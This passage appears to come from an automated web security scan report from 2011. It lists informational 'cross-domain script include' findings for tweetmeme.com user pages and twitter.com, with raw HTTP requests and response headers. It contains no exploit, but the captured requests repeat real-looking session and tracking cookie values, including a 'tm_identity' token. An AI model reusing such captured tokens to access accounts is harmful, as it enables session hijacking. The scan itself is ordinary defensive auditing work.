Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:40 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0030560493469238
X-Served-In: 0.88949203491211
X-Served-By: h02
Content-Length: 37545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
OnJ
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.447. http://tweetmeme.com/user/RWW previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/RWW

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/RWW HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:05 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0054531097412109
X-Served-In: 1.353590965271
X-Served-By: ded2061
Content-Length: 38834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
RWW
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.448. http://tweetmeme.com/user/TechCrunch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/TechCrunch

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/TechCrunch HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:20 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0027718544006348
X-Served-In: 1.540342092514
X-Served-By: ded2059
Content-Length: 39323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Tec
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.449. http://tweetmeme.com/user/YoPretty previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/YoPretty

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/YoPretty HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:53:01 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0019288063049316
X-Served-In: 1.5181400775909
X-Served-By: h03
Content-Length: 29797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
YoP
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.450. http://tweetmeme.com/user/acorvelli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/acorvelli

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/acorvelli HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:05 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0026319026947021
X-Served-In: 1.3433458805084
X-Served-By: h02
Content-Length: 39890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
aco
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.451. http://tweetmeme.com/user/alexia previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/alexia

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/alexia HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:19 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0044820308685303
X-Served-In: 1.8648369312286
X-Served-By: h01
Content-Length: 39176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
ale
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.452. http://tweetmeme.com/user/allkpop previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/allkpop

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/allkpop HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:36 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0036659240722656
X-Served-In: 1.7269580364227
X-Served-By: h01
Content-Length: 39202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
all
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.453. http://tweetmeme.com/user/britneyspears previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/britneyspears

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/britneyspears HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:53 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0026390552520752
X-Served-In: 1.5657958984375
X-Served-By: h02
Content-Length: 29782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
bri
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.454. http://tweetmeme.com/user/carbonmeme previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/carbonmeme

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/carbonmeme HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:53:12 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0038061141967773
X-Served-In: 1.6207311153412
X-Served-By: h01
Content-Length: 40219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
car
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.455. http://tweetmeme.com/user/cnn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/cnn

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/cnn HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:04 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0035941600799561
X-Served-In: 0.36921310424805
X-Served-By: ded2062
Content-Length: 39102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
CNN
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.456. http://tweetmeme.com/user/geekytechnews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/geekytechnews

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/geekytechnews HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:07 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0019528865814209
X-Served-In: 1.5276410579681
X-Served-By: ded2061
Content-Length: 39994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
gee
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.457. http://tweetmeme.com/user/lorakolodny previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/lorakolodny

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/lorakolodny HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:08 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0027039051055908
X-Served-In: 1.5502688884735
X-Served-By: h04
Content-Length: 39312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
lor
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.458. http://tweetmeme.com/user/mjsonly previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/mjsonly

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/mjsonly HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:56 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0020580291748047
X-Served-In: 1.6259660720825
X-Served-By: h01
Content-Length: 37195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
mjs
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.459. http://tweetmeme.com/user/otoolefan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/otoolefan

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/otoolefan HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:53:36 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0031058788299561
X-Served-In: 1.2631268501282
X-Served-By: ded2061
Content-Length: 36088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
OTO
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.460. http://tweetmeme.com/user/paulcarr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/paulcarr

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/paulcarr HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:31 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.003615140914917
X-Served-In: 0.51229000091553
X-Served-By: ded2062
Content-Length: 25395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
pau
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.461. http://tweetmeme.com/user/reiserlaw previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/reiserlaw

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/reiserlaw HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:53:52 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.002079963684082
X-Served-In: 2.6879899501801
X-Served-By: ded2062
Content-Length: 39563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
rei
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.462. http://tweetmeme.com/user/worldstar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/worldstar

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/worldstar HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:53:00 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0033619403839111
X-Served-In: 0.61441087722778
X-Served-By: h02
Content-Length: 25323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
WOR
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.463. http://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a2.twimg.com/a/1295646587/javascripts/fronts.js
http://a2.twimg.com/a/1295646587/javascripts/widgets/widget.js?1295901448
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /?q= HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.464. http://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295646587/javascripts/widgets/widget.js?1295653420
http://a2.twimg.com/a/1295646587/javascripts/fronts.js
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

